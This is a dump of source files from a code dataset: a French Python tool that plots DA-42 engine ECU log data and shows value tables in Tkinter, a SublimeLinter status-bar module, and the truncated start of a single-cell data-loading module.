load=[]\r\n alti=[]\r\n temps=[]\r\n ecuact=[]\r\n drail=[]\r\n dprop=[]\r\n dmap=[]\r\n \r\n \r\n for i in range(n-1):#debut,fin):\r\n s=fic.readline()\r\n s=s.split(\",\")\r\n \r\n temps.append(i)\r\n wg.append(round(float(s[iwg]),2)) \r\n disload.append(round(float(s[idisload]),1)) \r\n proprpm.append(round(float(s[iproprpm]),2)) \r\n propdc.append(round(float(s[ipropdc]),2))\r\n prspd.append(int(float(s[iprspd])))\r\n maptar.append(int(float(s[imaptar])))\r\n praildc.append(int(float(s[ipraildc])))\r\n pratar.append(int(float(s[ipratar])))\r\n prail.append(round(float(s[iprail]),1))\r\n map.append(int(float(s[imap])))\r\n engine.append(int(float(s[iengine])))\r\n vbatt.append(round(float(s[ivbatt]),1))\r\n tair.append(round(float(s[itair]),2))\r\n th2o.append(int(float(s[ith2o])))\r\n toil.append(int(float(s[itoil])))\r\n poil.append(round(float(s[ipoil]),1))\r\n tgear.append(int(float(s[itgear])))\r\n pbaro.append(int(float(s[ipbaro])))\r\n tecu.append(int(float(s[itecu])))\r\n fch.append(round(float(s[ifch]),2))\r\n load.append(round(float(s[iload]),1))\r\n alti.append(int(float(-(np.exp((np.log(abs(pbaro[-1]))-np.log(1013.25))/5.255)-1)*(288.15/0.0065)*3.5)))\r\n ecuact.append(190*float(s[iecuact]))\r\n drail.append(pratar[-1]-prail[-1])\r\n dprop.append(prspd[-1]-proprpm[-1])\r\n dmap.append(maptar[-1]-map[-1])\r\n # if (abs(alti[-1]-alti[-2])>1000 and i>debut+5): #pour éviter les valeurs incohérentes\r\n # alti[-1]=alti[-2] #ne fonctionne pas, on s'en passera pour le moment\r\n if prspd[-1]==-1: #permet de retirer les lignes où tout est égal à -1, les courbes sont vachement mieux et problème de l'alti réglée?\r\n for i in [temps,wg,disload,proprpm,propdc,prspd,maptar,praildc,pratar,prail,map,engine,vbatt,tair,th2o,toil,poil,tgear,pbaro,tecu,fch,load,alti,ecuact,drail,dprop,dmap]:\r\n del i[-1]\r\n \r\n fic.close() # fin du ctrl c\r\n \r\n except BaseException:\r\n print(\"Le fichier du moteur 1 semble corrompu, il faut effectuer de nouvelles mesures\")\r\n \r\n \r\n try:\r\n if int(maintenance)==1:\r\n choixcourbes()\r\n else:\r\n 
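# Editor's note: with the maintenance (depannage) mode off, this fixed tuple pre-selects the standard curves; its 22 flags map, in order, onto (wg3, disload3, proprpm3, propdc3, prspd3, maptar3, praildc3, pratar3, prail3, map3, engine3, vbatt3, tair3, th2o3, toil3, poil3, tgear3, pbaro3, tecu3, fch3, load3, alti3).\r\n                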
(wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)=(1,0,1,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0)\r\n \r\n niveau=min(alti) #penser à le refaire pour l'autre liste\r\n for i in range(len(alti)): #pour affiner la valeur de l'altitude, on considère 0m-> plus basse pression\r\n alti[i]=alti[i]-niveau\r\n \r\n except BaseException:\r\n print(\"Le fichier du moteur 1 semble corrompu, il faut effectuer de nouvelles mesures\")\r\n \r\n \r\n \r\n \r\n \r\n #DEUXIEME MOTEUR\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n if again==0: \r\n explo()\r\n chemin=chemin[0]+'/'+chemin[1] #l'adresse exacte du fichier avec le nom du fichier\r\n # fic=open('C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv',\"r\")\r\n fic=open(chemin,\"r\")\r\n \r\n n=0\r\n for line in fic: #pour compter le nombre de lignes dans le fichier\r\n n+=1\r\n fic.close()\r\n \r\n \r\n moteur=chemin[-28:-23] #numéro de série du moteur\r\n nbheures=chemin[-22:-18] #nombre d'heures de vol\r\n titre2=\"Moteur \"+moteur+\" \"+nbheures+\"h\"\r\n \r\n \r\n fic=open(chemin,\"r\")\r\n t2=fic.readline()\r\n t2=t2.split(\",\") \r\n \r\n ecu()\r\n \r\n # try:\r\n if int(ecu1)==1: #ECU B sélectionnée\r\n iiwg=t2.index('WG_DC-B190')\r\n iidisload=t2.index('DisLoad-B334')\r\n iiproprpm=t2.index('Prop RPM-B306')\r\n iipropdc=t2.index('Prop-DC-B313')\r\n iiprspd=t2.index('PrSpdTar-B308')\r\n iimaptar=t2.index('MAPTar-B181')\r\n iipraildc=t2.index('PRail_DC-B204')\r\n iipratar=t2.index('PRaTar-B192')\r\n iiprail=t2.index('PRail-B131')\r\n iimap=t2.index('MAP-B88')\r\n iiengine=t2.index('Engine Revs. RPM-B47')\r\n iivbatt=t2.index('VBatt-B91')\r\n iitair=t2.index('TAir-B93')\r\n iith2o=t2.index('TH2O-B92')\r\n iitoil=t2.index('TOil-B94')\r\n iipoil=t2.index('POil-B97')\r\n iitgear=t2.index('TGear-B267')\r\n iipbaro=t2.index('PBaro-B99')\r\n iitecu=t2.index('TECU-B96')\r\n iifch=t2.index('FCh-B246')\r\n iiload=t2.index('Load-B87')\r\n iiecuact=t2.index('ECU Act-B257') \r\n else: #ECU A sélectionée\r\n iiwg=t2.index('WG_DC-A190')\r\n iidisload=t2.index('DisLoad-A334')\r\n iiproprpm=t2.index('Prop RPM-A306')\r\n iipropdc=t2.index('Prop-DC-A313')\r\n iiprspd=t2.index('PrSpdTar-A308')\r\n iimaptar=t2.index('MAPTar-A181')\r\n iipraildc=t2.index('PRail_DC-A204')\r\n iipratar=t2.index('PRaTar-A192')\r\n iiprail=t2.index('PRail-A131')\r\n iimap=t2.index('MAP-A88')\r\n iiengine=t2.index('Engine Revs. 
RPM-A47')\r\n iivbatt=t2.index('VBatt-A91')\r\n iitair=t2.index('TAir-A93')\r\n iith2o=t2.index('TH2O-A92')\r\n iitoil=t2.index('TOil-A94')\r\n iipoil=t2.index('POil-A97')\r\n iitgear=t2.index('TGear-A267')\r\n iipbaro=t2.index('PBaro-A99')\r\n iitecu=t2.index('TECU-A96')\r\n iifch=t2.index('FCh-A246')\r\n iiload=t2.index('Load-A87')\r\n iiecuact=t2.index('ECU Act-A257')\r\n \r\n wgp=[]\r\n disloadp=[]\r\n proprpmp=[]\r\n propdcp=[]\r\n prspdp=[]\r\n maptarp=[]\r\n praildcp=[]\r\n pratarp=[]\r\n prailp=[]\r\n mapp=[]\r\n enginep=[]\r\n vbattp=[]\r\n tairp=[]\r\n th2op=[]\r\n toilp=[]\r\n poilp=[]\r\n tgearp=[]\r\n pbarop=[]\r\n tecup=[]\r\n fchp=[]\r\n loadp=[]\r\n altip=[]\r\n tempsp=[]\r\n ecuactp=[]\r\n drailp=[]\r\n dpropp=[]\r\n dmapp=[]\r\n \r\n\r\n for i in range(n-1):#debut,fin):\r\n s=fic.readline()\r\n s=s.split(\",\")\r\n\r\n tempsp.append(i)\r\n wgp.append(round(float(s[iiwg]),2)) \r\n disloadp.append(round(float(s[iidisload]),1) ) \r\n proprpmp.append(round(float(s[iiproprpm]),2))\r\n propdcp.append(round(float(s[iipropdc]),2))\r\n prspdp.append(int(float(s[iiprspd])))\r\n maptarp.append(int(float(s[iimaptar])))\r\n praildcp.append(int(float(s[iipraildc])))\r\n pratarp.append(int(float(s[iipratar])))\r\n prailp.append(round(float(s[iiprail]),2))\r\n mapp.append(int(float(s[iimap])))\r\n enginep.append(int(float(s[iiengine])))\r\n vbattp.append(round(float(s[iivbatt]),1))\r\n tairp.append(round(float(s[iitair]),2))\r\n th2op.append(int(float(s[iith2o])))\r\n toilp.append(int(float(s[iitoil])))\r\n poilp.append(round(float(s[iipoil]),1))\r\n tgearp.append(int(float(s[iitgear])))\r\n pbarop.append(int(float(s[iipbaro])))\r\n tecup.append(int(float(s[iitecu])))\r\n fchp.append(round(float(s[iifch]),2))\r\n loadp.append(round(float(s[iiload]),1))\r\n altip.append(int(float(-(np.exp((np.log(abs(pbarop[-1]))-np.log(1013.25))/5.255)-1)*(288.15/0.0065)*3.5)))\r\n ecuactp.append(190*float(s[iiecuact]))\r\n drailp.append(pratarp[-1]-prailp[-1])\r\n dpropp.append(prspdp[-1]-proprpmp[-1])\r\n dmapp.append(maptarp[-1]-mapp[-1])\r\n # if (abs(alti[-1]-alti[-2])>1000 and i>debut+5): #pour éviter les valeurs incohérentes\r\n # alti[-1]=alti[-2] #ne fonctionne pas, on s'en passera pour le moment\r\n if prspdp[-1]==-1: #permet de retirer les lignes où tout est égal à -1, les courbes sont vachement mieux et problème de l'alti réglée?\r\n for i in [tempsp,wgp,disloadp,proprpmp,propdcp,prspdp,maptarp,praildcp,pratarp,prailp,mapp,enginep,vbattp,tairp,th2op,toilp,poilp,tgearp,pbarop,tecup,fchp,loadp,altip,ecuactp,drailp,dpropp,dmapp]:\r\n del i[-1]\r\n \r\n fic.close()\r\n \r\n niveau=min(altip) \r\n for i in range(len(altip)): #pour affiner la valeur de l'altitude, on considère 0m-> plus basse pression\r\n altip[i]=altip[i]-niveau\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n k=(wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)\r\n fig=plt.figure(figsize=(40,20))\r\n # ax = fig.add_subplot(111, axisbg='#FFFFFF') #si on veut rajouter des barres horizontales et verticales autour du curseur, +voir ligne curseur\r\n tableau=[]\r\n tableau2=[]\r\n tableau.append(temps)\r\n tableau2.append(tempsp) #tableau des valeurs qu'on va afficher après\r\n courbes=['Temps']\r\n courbes2=['Temps']\r\n \r\n plt.subplot(211)\r\n if k[0]:\r\n plt.plot(temps,wg,label='Waste Gate')\r\n tableau.append(wg)\r\n courbes.append('Waste Gate') #titre à afficher pour le tableau de valeurs\r\n if k[5]:\r\n 
plt.plot(temps,maptar,label='Map Tar')\r\n tableau.append(maptar)\r\n courbes.append('Map Tar')\r\n if k[9]:\r\n plt.plot(temps,map,label='MAP')\r\n tableau.append(map)\r\n courbes.append('MAP')\r\n if int(maintenance)==0:\r\n tableau.append(dmap)\r\n courbes.append('Écart MAP')\r\n if k[1]:\r\n plt.plot(temps,disload,label='DisLoad')\r\n tableau.append(disload)\r\n courbes.append('DisLoad')\r\n if k[10]:\r\n plt.plot(temps,engine,label='Engine Revs. RPM-A47')\r\n tableau.append(engine)\r\n courbes.append('Engine Revs. RPM-A47')\r\n if k[20]:\r\n plt.plot(temps,load,label='Load-A87')\r\n tableau.append(load)\r\n courbes.append('Load-A87')\r\n if k[4]:\r\n plt.plot(temps,prspd,label='Prop Speed')\r\n tableau.append(prspd)\r\n courbes.append('Prop Speed')\r\n if k[2]:\r\n plt.plot(temps,proprpm,label='Prop RPM')\r\n tableau.append(proprpm)\r\n courbes.append('Prop RPM')\r\n if int(maintenance)==0:\r\n tableau.append(dprop)\r\n courbes.append('Écart PROP')\r\n if k[3]:\r\n plt.plot(temps,propdc,label='Prop DC')\r\n tableau.append(propdc)\r\n courbes.append('Prop DC')\r\n if k[6]:\r\n plt.plot(temps,praildc,label='Prail DC')\r\n tableau.append(praildc)\r\n courbes.append('Prail DC')\r\n if k[7]:\r\n plt.plot(temps,pratar,label='PraTar')\r\n tableau.append(pratar)\r\n courbes.append('PraTar')\r\n if k[8]:\r\n plt.plot(temps,prail,label='Prail')\r\n tableau.append(prail)\r\n courbes.append('Prail')\r\n if int(maintenance)==0:\r\n tableau.append(drail)\r\n courbes.append('Écart Rail')\r\n if k[19]:\r\n plt.plot(temps,fch,label='FCh-A246')\r\n tableau.append(fch)\r\n courbes.append('FCh-A246')\r\n if k[12]:\r\n plt.plot(temps,tair,label='TAir-A93')\r\n tableau.append(tair)\r\n courbes.append('TAir-A93')\r\n if k[13]:\r\n plt.plot(temps,th2o,label='TH2O-A92')\r\n tableau.append(th2o)\r\n courbes.append('TH2O-A92')\r\n if k[14]:\r\n plt.plot(temps,toil,label='TOil-A94')\r\n tableau.append(toil)\r\n courbes.append('TOil-A94')\r\n if k[16]:\r\n plt.plot(temps,tgear,label='TGear-A267')\r\n tableau.append(tgear)\r\n courbes.append('TGear-A267')\r\n if k[18]:\r\n plt.plot(temps,tecu,label='TECU-A96')\r\n tableau.append(tecu)\r\n courbes.append('TECU-A96')\r\n if k[15]:\r\n plt.plot(temps,poil,label='POil-A97')\r\n tableau.append(poil)\r\n courbes.append('POil-A97')\r\n if k[17]:\r\n plt.plot(temps,pbaro,label='PBaro-A99')\r\n tableau.append(pbaro)\r\n courbes.append('PBaro-A99')\r\n if k[21]:\r\n plt.plot(temps,alti,label=\"Allure de l'altitude\")\r\n tableau.append(alti)\r\n courbes.append(\"Altitude\")\r\n if k[11]:\r\n plt.plot(temps,vbatt,label='VBatt-A91')\r\n tableau.append(vbatt)\r\n courbes.append('VBatt-A91')\r\n plt.plot(temps,ecuact,'#798081',label=t[iecuact]) #hexa du gris, courbe pour voir si l'ECU selectionnée est active\r\n plt.legend()\r\n if ecu0=='0':\r\n titre+=' ECU A'\r\n else:\r\n titre+=' ECU B'\r\n plt.title(titre) #immat du moteur+nombre d'heures de vol\r\n \r\n \r\n plt.subplot(212)\r\n \r\n \r\n if k[0]:\r\n plt.plot(tempsp,wgp,label='Waste Gate')\r\n tableau2.append(wgp)\r\n courbes2.append('Waste Gate') #titre à afficher pour le tableau2 de valeurs\r\n if k[5]:\r\n plt.plot(tempsp,maptarp,label='Map Tar')\r\n tableau2.append(maptarp)\r\n courbes2.append('Map Tar')\r\n if k[9]:\r\n plt.plot(tempsp,mapp,label='MAP')\r\n tableau2.append(mapp)\r\n courbes2.append('MAP')\r\n if int(maintenance)==0:\r\n tableau2.append(dmapp)\r\n courbes2.append('Écart MAP')\r\n if k[1]:\r\n plt.plot(tempsp,disloadp,label='DisLoad')\r\n tableau2.append(disloadp)\r\n courbes2.append('DisLoad')\r\n 
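# Editor's note: this second subplot mirrors the engine-1 plotting block for engine 2; the legend labels hard-code the '-A' sensor names even when ECU B is selected, so only the figure title reflects the ECU choice.\r\n        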
if k[10]:\r\n plt.plot(tempsp,enginep,label='Engine Revs. RPM-A47')\r\n tableau2.append(enginep)\r\n courbes2.append('Engine Revs. RPM-A47')\r\n if k[20]:\r\n plt.plot(tempsp,loadp,label='Load-A87')\r\n tableau2.append(loadp)\r\n courbes2.append('Load-A87')\r\n if k[4]:\r\n plt.plot(tempsp,prspdp,label='Prop Speed')\r\n tableau2.append(prspdp)\r\n courbes2.append('Prop Speed')\r\n if k[2]:\r\n plt.plot(tempsp,proprpmp,label='Prop RPM')\r\n tableau2.append(proprpmp)\r\n courbes2.append('Prop RPM')\r\n if int(maintenance)==0:\r\n tableau2.append(dpropp)\r\n courbes2.append('Écart PROP')\r\n if k[3]:\r\n plt.plot(tempsp,propdcp,label='Prop DC')\r\n tableau2.append(propdcp)\r\n courbes2.append('Prop DC')\r\n if k[6]:\r\n plt.plot(tempsp,praildcp,label='Prail DC')\r\n tableau2.append(praildcp)\r\n courbes2.append('Prail DC')\r\n if k[7]:\r\n plt.plot(tempsp,pratarp,label='PraTar')\r\n tableau2.append(pratarp)\r\n courbes2.append('PraTar')\r\n if k[8]:\r\n plt.plot(tempsp,prailp,label='Prail')\r\n tableau2.append(prailp)\r\n courbes2.append('Prail')\r\n if int(maintenance)==0:\r\n tableau2.append(drailp)\r\n courbes2.append('Écart Rail')\r\n if k[19]:\r\n plt.plot(tempsp,fchp,label='FCh-A246')\r\n tableau2.append(fchp)\r\n courbes2.append('FCh-A246')\r\n if k[12]:\r\n plt.plot(tempsp,tairp,label='TAir-A93')\r\n tableau2.append(tairp)\r\n courbes2.append('TAir-A93')\r\n if k[13]:\r\n plt.plot(tempsp,th2op,label='TH2O-A92')\r\n tableau2.append(th2op)\r\n courbes2.append('TH2O-A92')\r\n if k[14]:\r\n plt.plot(tempsp,toilp,label='TOil-A94')\r\n tableau2.append(toilp)\r\n courbes2.append('TOil-A94')\r\n if k[16]:\r\n plt.plot(tempsp,tgearp,label='TGear-A267')\r\n tableau2.append(tgearp)\r\n courbes2.append('TGear-A267')\r\n if k[18]:\r\n plt.plot(tempsp,tecup,label='TECU-A96')\r\n tableau2.append(tecup)\r\n courbes2.append('TECU-A96')\r\n if k[15]:\r\n plt.plot(tempsp,poilp,label='POil-A97')\r\n tableau2.append(poilp)\r\n courbes2.append('POil-A97')\r\n if k[17]:\r\n plt.plot(tempsp,pbarop,label='PBaro-A99')\r\n tableau2.append(pbarop)\r\n courbes2.append('PBaro-A99')\r\n if k[21]:\r\n plt.plot(tempsp,altip,label=\"Allure de l'altitude\")\r\n tableau2.append(altip)\r\n courbes2.append(\"Altitude\")\r\n if k[11]:\r\n plt.plot(tempsp,vbattp,label='VBatt-A91')\r\n tableau2.append(vbattp)\r\n courbes2.append('VBatt-A91')\r\n plt.plot(tempsp,ecuactp,'#798081',label=t[iiecuact]) #hexa du gris, courbe pour voir si l'ECU selectionnée est active\r\n plt.legend()\r\n if ecu1=='0':\r\n titre2+=' ECU A'\r\n else:\r\n titre2+=' ECU B'\r\n plt.title(titre2) #immat du moteur+nombre d'heures de vol\r\n \r\n \r\n plt.show()\r\n again+=1\r\n l=''\r\n for i in courbes:\r\n c=len(i)\r\n c-=11\r\n c=-c\r\n c=c*' '\r\n l+=i+c\r\n # ppp=l+'\\n'\r\n ppp=''\r\n temp=''\r\n for j in range(len(tableau[0])):\r\n temp=' '\r\n for i in range(len(tableau)):\r\n b=len(str(tableau[i][j]))\r\n b-=11\r\n b=-b\r\n b=b*' '\r\n temp=temp+str(tableau[i][j])+b\r\n # print(str(temp)[1:-1])\r\n temp+='\\n'\r\n ppp+=temp\r\n \r\n l2=''\r\n for i in courbes2:\r\n c2=len(i)\r\n c2-=11\r\n c2=-c2\r\n c2=c2*' '\r\n l2+=i+c2\r\n # ppp=l+'\\n'\r\n ppp2=''\r\n temp2=''\r\n for j in range(len(tableau2[0])):\r\n temp2=' '\r\n for i in range(len(tableau2)):\r\n b2=len(str(tableau2[i][j]))\r\n b2-=11\r\n b2=-b2\r\n b2=b2*' '\r\n temp2=temp2+str(tableau2[i][j])+b2\r\n # print(str(temp)[1:-1])\r\n temp2+='\\n'\r\n ppp2+=temp2\r\n \r\n \r\n \r\n \r\n root = Tk()\r\n root.title('Tableau de valeurs 1')\r\n Frame6 = 
Frame(root,borderwidth=0)#,relief=GROOVE)\r\n        Frame6.pack(side=TOP,padx=10,pady=10)\r\n        U=Text(Frame6, height=0, width=13*len(courbes))\r\n        U.pack()\r\n        U.insert(END,l)\r\n        T = Text(root, height=400, width=13*len(courbes))\r\n        T.pack()\r\n        T.insert(END, ppp)\r\n        mainloop()\r\n        \r\n        root = Tk()\r\n        root.title('Tableau de valeurs 2')\r\n        Frame6 = Frame(root,borderwidth=0)#,relief=GROOVE)\r\n        Frame6.pack(side=TOP,padx=10,pady=10)\r\n        U=Text(Frame6, height=0, width=13*len(courbes2))\r\n        U.pack()\r\n        U.insert(END,l2)\r\n        T = Text(root, height=400, width=13*len(courbes2))\r\n        T.pack()\r\n        T.insert(END, ppp2)\r\n        mainloop()\r\n        # \r\n        # print(courbes)\r\n        # for i in range (len(tableau)):\r\n        #         print(tableau[i])\r\n        # except BaseException:\r\n        #     print('The engine 2 file appears to be corrupted; new measurements must be taken')\r\n        recommencer=0\r\n        # recommencer=input(\"Start over? 1 for yes :\")\r\n        global fenetre2\r\n        fenetre2=Tk() #radio buttons (only one can be selected at a time)\r\n        fenetre2.title(\"\")\r\n        quitt=Button(fenetre2, text=\"Quitter\", command=fenetre2.destroy)\r\n        reco=Button(fenetre2, text='Recommencer', command=f)\r\n        propos=Button(fenetre2, text='À propos',command=apropos)\r\n        # valeurs1=Button(fenetre2, text=\"Afficher le 1er tableau\", command=h(ppp))\r\n        # valeurs2=Button(fenetre2, text=\"Afficher le 2ème tableau\", command=h(ppp2))\r\n        # valeurs1.pack()\r\n        # valeurs2.pack()\r\n        reco.pack()\r\n        propos.pack()\r\n        quitt.pack()\r\n        mainloop()\r\n    \r\n    \r\n    \r\n    \r\n\r\nlargeur=60\r\n\r\nglobal nbdemoteurs\r\nfenetre=Tk() #radio buttons (only one can be selected at a time)\r\nfenetre.title(\"Choix du nombre de moteurs\")\r\nvar = StringVar()\r\nc1 = Radiobutton(fenetre, text=\"Un moteur\", variable=var, value=0, width=largeur)\r\nc2 = Radiobutton(fenetre, text=\"Deux moteurs\", variable=var, value=1,width=largeur)\r\nOK=Button(fenetre, text='OK', command=fenetre.destroy)\r\nc1.pack()\r\nc2.pack()\r\nOK.pack()\r\nc1.select()\r\nmainloop()\r\nnbdemoteurs=var.get() #-> retrieves the value associated with the selected radio button \r\n\r\nif str(nbdemoteurs)=='1':\r\n    rtlf2()\r\nelse:\r\n    rtlf()\r\n\r\n\r\n","repo_name":"LoOTW/Diamant2","sub_path":"RTLF_DA-42.py","file_name":"RTLF_DA-42.py","file_ext":"py","file_size_in_byte":53146,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34958380584","text":"from collections import defaultdict\nfrom functools import partial\nimport threading\n\nimport sublime\nimport sublime_plugin\n\nfrom .lint import events, persist, util\n\n\nMYPY = False\nif MYPY:\n    from typing import DefaultDict, Dict, Iterator, List, Set\n    from mypy_extensions import TypedDict\n\n    FileName = str\n    LinterName = str\n    State_ = TypedDict('State_', {\n        'assigned_linters_per_file': DefaultDict[FileName, Set[LinterName]],\n        'failed_linters_per_file': DefaultDict[FileName, Set[LinterName]],\n        'problems_per_file': DefaultDict[FileName, Dict[LinterName, str]],\n        'running': DefaultDict[FileName, int],\n        'expanded_ok': Set[FileName],\n    })\n\n\nSTATUS_ACTIVE_KEY = 'sublime_linter_status_active'\n\nState = {\n    'assigned_linters_per_file': defaultdict(set),\n    'failed_linters_per_file': defaultdict(set),\n    'problems_per_file': defaultdict(dict),\n    'running': defaultdict(int),\n    'expanded_ok': set(),\n}  # type: State_\n\n\ndef plugin_unloaded():\n    events.off(redraw_file)\n    events.off(on_begin_linting)\n    events.off(on_finished_linting)\n    events.off(on_actual_linters_changed)\n\n    for window in sublime.windows():\n        for view in 
window.views():\n view.erase_status(STATUS_ACTIVE_KEY)\n\n\n@events.on(events.LINT_START)\ndef on_begin_linting(filename):\n # type: (FileName) -> None\n State['running'][filename] += 1\n\n\n@events.on(events.LINT_END)\ndef on_finished_linting(filename):\n # type: (FileName) -> None\n if State['running'][filename] <= 1:\n State['running'].pop(filename)\n else:\n State['running'][filename] -= 1\n\n\ndef on_first_activate(view):\n # type: (sublime.View) -> None\n if not util.is_lintable(view):\n return\n\n filename = util.canonical_filename(view)\n set_expanded_ok(filename)\n draw(view, State['problems_per_file'][filename], expanded_ok=True)\n\n\ndef on_assigned_linters_changed(filename):\n # type: (FileName) -> None\n set_expanded_ok(filename)\n redraw_file_(filename, State['problems_per_file'][filename], expanded_ok=True)\n\n\ndef set_expanded_ok(filename):\n # type: (FileName) -> None\n State['expanded_ok'].add(filename)\n\n\ndef enqueue_unset_expanded_ok(view, timeout=3000):\n # type: (sublime.View, int) -> None\n sublime.set_timeout(\n throttled_on_args(_unset_expanded_ok, view.id()),\n timeout\n )\n\n\ndef _unset_expanded_ok(vid):\n # type: (sublime.ViewId) -> None\n view = sublime.View(vid)\n if not view.is_valid():\n return\n\n filename = util.canonical_filename(view)\n # Keep expanded if linters are running to minimize redraws\n if State['running'].get(filename, 0) > 0:\n enqueue_unset_expanded_ok(view)\n return\n\n State['expanded_ok'].discard(filename)\n draw(view, State['problems_per_file'][filename], expanded_ok=False)\n\n\nclass sublime_linter_assigned(sublime_plugin.WindowCommand):\n def run(self, filename, linter_names):\n # type: (FileName, List[LinterName]) -> None\n State['assigned_linters_per_file'][filename] = set(linter_names)\n State['failed_linters_per_file'][filename] = set()\n\n if assigned_linters_changed(filename, linter_names):\n on_assigned_linters_changed(filename)\n\n\nclass sublime_linter_unassigned(sublime_plugin.WindowCommand):\n def run(self, filename, linter_name):\n State['assigned_linters_per_file'][filename].discard(linter_name)\n State['failed_linters_per_file'][filename].discard(linter_name)\n\n\nclass sublime_linter_failed(sublime_plugin.WindowCommand):\n def run(self, filename, linter_name):\n State['failed_linters_per_file'][filename].add(linter_name)\n\n\n@events.on(events.LINT_RESULT)\ndef redraw_file(filename, linter_name, errors, **kwargs):\n # type: (FileName, LinterName, List[persist.LintError], object) -> None\n problems = State['problems_per_file'][filename]\n if linter_name in State['failed_linters_per_file'][filename]:\n problems[linter_name] = '?'\n elif linter_name in State['assigned_linters_per_file'][filename] or errors:\n if linter_name not in State['assigned_linters_per_file'][filename]:\n State['assigned_linters_per_file'][filename].add(linter_name)\n\n counts = count_problems(errors)\n if sum(counts.values()) == 0:\n problems[linter_name] = ''\n else:\n sorted_keys = (\n tuple(sorted(counts.keys() - {'w', 'e'}))\n + ('w', 'e')\n )\n parts = ' '.join(\n \"{}:{}\".format(error_type, counts[error_type])\n for error_type in sorted_keys\n if error_type in counts and counts[error_type] > 0\n )\n problems[linter_name] = '({})'.format(parts)\n else:\n problems.pop(linter_name, None)\n\n remember_actual_linters(filename, set(problems.keys()))\n\n sublime.set_timeout(\n lambda: redraw_file_(\n filename,\n problems,\n # eval on the UI thread!\n expanded_ok=filename in State['expanded_ok']\n )\n 
)\n\n\n@events.on('actual_linters_changed')\ndef on_actual_linters_changed(filename, linter_names):\n set_expanded_ok(filename)\n\n\ndef count_problems(errors):\n # type: (List[persist.LintError]) -> Dict[str, int]\n counters = defaultdict(int) # type: DefaultDict[str, int]\n for error in errors:\n error_type = error['error_type']\n counters[error_type[0]] += 1\n\n return counters\n\n\ndef redraw_file_(filename, problems, expanded_ok):\n # type: (FileName, Dict[LinterName, str], bool) -> None\n for view in views_into_file(filename):\n draw(view, problems, expanded_ok)\n\n\ndef views_into_file(filename):\n # type: (FileName) -> Iterator[sublime.View]\n return (\n view\n for window in sublime.windows()\n for view in window.views()\n if util.canonical_filename(view) == filename\n )\n\n\ndef draw(view, problems, expanded_ok):\n # type: (sublime.View, Dict[LinterName, str], bool) -> None\n if persist.settings.get('statusbar.show_active_linters'):\n if (\n not expanded_ok\n and problems.keys()\n and all(part == '' for part in problems.values())\n ):\n message = 'ok'\n view.set_status(STATUS_ACTIVE_KEY, message)\n return\n\n message = ' '.join(\n '{}{}'.format(linter_name, summary)\n for linter_name, summary in sorted(problems.items(), key=by_severity)\n )\n view.set_status(STATUS_ACTIVE_KEY, message)\n enqueue_unset_expanded_ok(view)\n else:\n view.erase_status(STATUS_ACTIVE_KEY)\n\n\ndef by_severity(item):\n linter_name, summary = item\n if summary == '':\n return (0, linter_name)\n elif summary[0] == '?':\n return (2, linter_name)\n return (1, linter_name)\n\n\nTHROTTLER_TOKENS = {}\nTHROTTLER_LOCK = threading.Lock()\n\n\ndef throttled_on_args(fn, *args, **kwargs):\n key = (fn,) + args\n action = partial(fn, *args, **kwargs)\n with THROTTLER_LOCK:\n THROTTLER_TOKENS[key] = action\n\n def program():\n with THROTTLER_LOCK:\n # Use `get` bc during hot-reload `THROTTLER_TOKENS` gets emptied\n ok = THROTTLER_TOKENS.get(key) == action\n if ok:\n action()\n\n return program\n\n\nACTIVATED_VIEWS = set()\n\n\nclass OnFirstActivate(sublime_plugin.EventListener):\n def on_activated(self, view):\n # type: (sublime.View) -> None\n vid = view.id()\n if vid in ACTIVATED_VIEWS:\n return\n\n ACTIVATED_VIEWS.add(vid)\n on_first_activate(view)\n\n def on_close(self, view):\n # type: (sublime.View) -> None\n ACTIVATED_VIEWS.discard(view.id())\n\n\nif MYPY:\n from typing import Container, TypeVar\n T = TypeVar('T')\n U = TypeVar('U')\n\n\nASSIGNED_LINTERS = {} # type: Dict[FileName, Container[LinterName]]\n\n\ndef remember_actual_linters(filename, linter_names):\n # type: (FileName, Set[LinterName]) -> None\n previous = persist.actual_linters.get(filename)\n current = persist.actual_linters[filename] = linter_names\n if current != previous:\n events.broadcast('actual_linters_changed', {\n 'filename': filename,\n 'linter_names': linter_names\n })\n\n\ndef assigned_linters_changed(filename, linter_names):\n # type: (FileName, Container[LinterName]) -> bool\n return not distinct_mapping(ASSIGNED_LINTERS, filename, linter_names)\n\n\ndef distinct_mapping(store, key, val):\n # type: (Dict[T, U], T, U) -> bool\n previous = store.get(key)\n current = store[key] = val\n return current == previous\n","repo_name":"SublimeLinter/SublimeLinter","sub_path":"active_linters_view.py","file_name":"active_linters_view.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":1995,"dataset":"github-code","pt":"53"} +{"seq_id":"17982694321","text":"import collections\nimport os\nimport 
os.path as osp\nimport pprint\nimport shutil\nimport sys\nfrom glob import glob\n\nimport anndata as ad\nimport h5py\nimport numpy as np\nimport pandas as pd\nimport scanpy as sc\nfrom scipy.sparse import csr_matrix\n\nfrom dance import logger\nfrom dance.config import METADIR\nfrom dance.data import Data\nfrom dance.datasets.base import BaseDataset\nfrom dance.metadata.imputation import IMPUTATION_DATASET_TO_FILE\nfrom dance.registers import register_dataset\nfrom dance.typing import Dict, List, Optional, Set, Tuple\nfrom dance.utils.download import download_file, download_unzip\nfrom dance.utils.io import load_data_url_dict_from_csv\nfrom dance.utils.preprocess import cell_label_to_df\n\n\ndef _load_scdeepsort_metadata():\n path = METADIR / \"scdeepsort.csv\"\n logger.debug(f\"Loading scdeepsort metadata from {path}\")\n scdeepsort_meta_df = pd.read_csv(path).astype(str)\n\n bench_url_dict, available_data = {}, []\n for _, i in scdeepsort_meta_df.iterrows():\n bench_url_dict[i[\"celltype_fname\"]] = i[\"celltype_url\"]\n bench_url_dict[i[\"data_fname\"]] = i[\"data_url\"]\n 